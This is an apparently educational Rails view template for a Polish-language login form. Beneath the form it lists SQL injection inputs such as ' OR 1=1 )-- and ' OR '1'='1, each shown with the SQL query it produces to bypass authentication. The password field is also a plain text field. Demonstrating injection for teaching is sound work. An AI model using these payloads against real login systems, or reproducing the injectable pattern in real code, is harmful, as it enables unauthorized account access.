<fieldset>
  <legend>Logowanie</legend>
<% form_tag do %>
  Login:
  <%= text_field_tag :name, params[:name], :size => 40 %> <br />
  Hasło:
  <%= text_field_tag :password, params[:password] %> <br />
  
  <%= submit_tag 'Zaloguj'%>
<% end %>
</fieldset>
<br />
<br /><br /><br /><br />
<div id="notes"> 
Przykłady zapytań: <br /><br />
login: ' OR 1=1 )--<br />

<div class="small" onmouseover="this.className='big'" onmouseout="this.className='small'">
SELECT "users".* FROM "users" WHERE (name = '' OR 1=1 )--' AND password = '') LIMIT 1
</div>
<br />
login: ' OR '1'='1 a hasło ' OR '2'>'1 

<div class="small" onmouseover="this.className='big'" onmouseout="this.className='small'">
   SELECT "users".* FROM "users" WHERE (name = '' OR '1'='1' AND password = '' OR '2'>'1')
</div>
</div>
